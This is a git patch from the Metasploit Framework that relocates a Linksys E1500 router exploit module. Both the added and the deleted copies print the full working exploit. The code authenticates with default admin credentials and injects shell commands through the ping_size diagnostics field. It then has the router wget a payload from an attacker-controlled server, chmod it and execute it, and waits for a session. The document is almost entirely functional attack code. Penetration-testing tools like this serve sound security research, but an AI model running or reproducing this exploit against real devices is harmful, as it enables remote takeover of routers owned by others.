From dfd451f8750904124d557c02b01e29ee4b9ae4bb Mon Sep 17 00:00:00 2001 From: m-1-k-3 Date: Wed, 27 Mar 2013 17:46:02 +0100 Subject: [PATCH] make msftidy happy --- .../linux/http/linksys_e1500_up_exec.rb | 192 +++++++++++++++++ .../multi/http/linksys_e1500_up_exec.rb | 196 ------------------ 2 files changed, 192 insertions(+), 196 deletions(-) create mode 100644 modules/exploits/linux/http/linksys_e1500_up_exec.rb delete mode 100644 modules/exploits/multi/http/linksys_e1500_up_exec.rb diff --git a/modules/exploits/linux/http/linksys_e1500_up_exec.rb b/modules/exploits/linux/http/linksys_e1500_up_exec.rb new file mode 100644 index 0000000000..9a701d3fb8 --- /dev/null +++ b/modules/exploits/linux/http/linksys_e1500_up_exec.rb @@ -0,0 +1,192 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Linksys E1500 Command Execution - Upload and Execute', + 'Description' => %q{ + This module can be used to execute a payload on Linksys Routers + }, + 'Author' => [ 'Michael Messner '], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'BID', '57760' ], + [ 'EDB', '24475' ], + [ 'OSVDB', '89912' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ] + ], + 'DisclosureDate' => 'Feb 05 2013', + 'Privileged' => true, + 'Platform' => [ 'linux' ], + 'Arch' => ARCH_MIPSLE, + 'Targets' => [[ 'Automatic', { }]], + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true, + }, + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), + OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), + OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]), + OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]), + OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]), + ], self.class) + end + + #MISSING - command execution payload + + def request(cmd,user,pass,uri) + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + "submit_button" => "Diagnostics", + "change_action" => "gozila_cgi", + "submit_type" => "start_ping", + "action" => "", + "commit" => "0", + "ping_ip" => "1.1.1.1", + "ping_size" => "&#{cmd}&", + "ping_times" => "5", + "traceroute_ip" => "" + } + }) + + if (! res) + fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]") + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + end + + def exploit + downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) + uri = '/apply.cgi' + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + rhost = datastore['RHOST'] + rport = datastore['RPORT'] + + # We must regenerate the payload-> not sure if this is the right way + arch = "ARCH_MIPSLE" + plat = "linux" + p = exploit_regenerate_payload(plat, arch) + @pl = p.encoded_exe + + # + # start our server + # + resource_uri = '/' + downfile + service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri + print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + + if (datastore['DOWNHOST']) + service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri + end + + + # + # testing Login + # + + print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") + + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + + return if res.nil? + return if (res.code == 404) + + if [200, 301, 302].include?(res.code) + print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") + else + print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") + return + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return + end + + print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") + + #this filename is used to store the payload on the device + filename = rand_text_alpha_lower(8) + + cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" + + request(cmd,user,pass,uri) + + # + # chmod + # + + cmd = "chmod 777 /tmp/#{filename}" + + print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}") + + request(cmd,user,pass,uri) + + # + # execute + # + + cmd = "/tmp/#{filename}" + + print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") + + request(cmd,user,pass,uri) + + handler + end + + +# # Handle incoming requests from the server + def on_request_uri(cli, request) + + #print_status("on_request_uri called: #{request.inspect}") + if (not @pl) + print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") + return + end + + print_status("#{rhost}:#{rport} - Sending the payload to the server...") + send_response(cli, @pl) + end + +end diff --git a/modules/exploits/multi/http/linksys_e1500_up_exec.rb b/modules/exploits/multi/http/linksys_e1500_up_exec.rb deleted file mode 100644 index 46a19fbd7b..0000000000 --- a/modules/exploits/multi/http/linksys_e1500_up_exec.rb +++ /dev/null @@ -1,196 +0,0 @@ -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::Remote::HttpServer - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Linksys E1500 Command Execution - Upload and Execute', - 'Description' => %q{ - This module can be used to execute a payload on Linksys Routers - }, - 'Author' => [ 'Michael Messner '], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'BID', '57760' ], - [ 'EDB', '24475' ], - [ 'OSVDB', '89912' ], - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ] - ], - 'DisclosureDate' => 'Feb 05 2013', - 'Privileged' => true, - 'Platform' => [ 'linux' ], - 'Arch' => ARCH_MIPSLE, - 'Targets' => [[ 'Automatic', { }]], - 'Payload' => - { - 'Space' => 1024, - 'DisableNops' => true, - }, - 'DefaultTarget' => 0 - )) - - register_options( - [ - Opt::RPORT(80), - OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), - OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), - OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]), - OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]), - OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]), - ], self.class) - end - - - - def request(cmd,user,pass,uri) - - begin - res = send_request_cgi({ - 'uri' => uri, - 'method' => 'POST', - 'authorization' => basic_auth(user,pass), - 'encode_params' => true, - 'vars_post' => { - "submit_button" => "Diagnostics", - "change_action" => "gozila_cgi", - "submit_type" => "start_ping", - "action" => "", - "commit" => "0", - "ping_ip" => "1.1.1.1", - "ping_size" => "&#{cmd}&", - "ping_times" => "5", - "traceroute_ip" => "" - } - }) - - if (! res) - fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]") - end - - rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return - end - - - end - - def exploit - downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) - uri = '/apply.cgi' - user = datastore['USERNAME'] - pass = datastore['PASSWORD'] - rhost = datastore['RHOST'] - rport = datastore['RPORT'] - - # We must regenerate the payload-> not sure if this is the right way - arch = "ARCH_MIPSLE" - plat = "linux" - p = exploit_regenerate_payload(plat, arch) - @pl = p.encoded_exe - - # - # start our server - # - resource_uri = '/' + downfile - service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri - print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") - start_service({'Uri' => { - 'Proc' => Proc.new { |cli, req| - on_request_uri(cli, req) - }, - 'Path' => resource_uri - }}) - - if (datastore['DOWNHOST']) - service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri - end - - - # - # testing Login - # - - print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") - - begin - res = send_request_cgi({ - 'uri' => uri, - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - - return if res.nil? - return if (res.code == 404) - - if [200, 301, 302].include?(res.code) - print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") - else - print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") - return - end - - rescue ::Rex::ConnectionError - vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") - return - end - - print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}") - - #this filename is used to store the payload on the device - filename = rand_text_alpha_lower(8) - - cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" - - request(cmd,user,pass,uri) - - # - # chmod - # - - cmd = "chmod 777 /tmp/#{filename}" - - print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}") - - request(cmd,user,pass,uri) - - # - # execute - # - - cmd = "/tmp/#{filename}" - - print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") - - request(cmd,user,pass,uri) - - handler - end - - -# # Handle incoming requests from the server - def on_request_uri(cli, request) - - #print_status("on_request_uri called: #{request.inspect}") - if (not @pl) - print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") - return - end - - print_status("#{rhost}:#{rport} - Sending the payload to the server...") - send_response(cli, @pl) - end - -end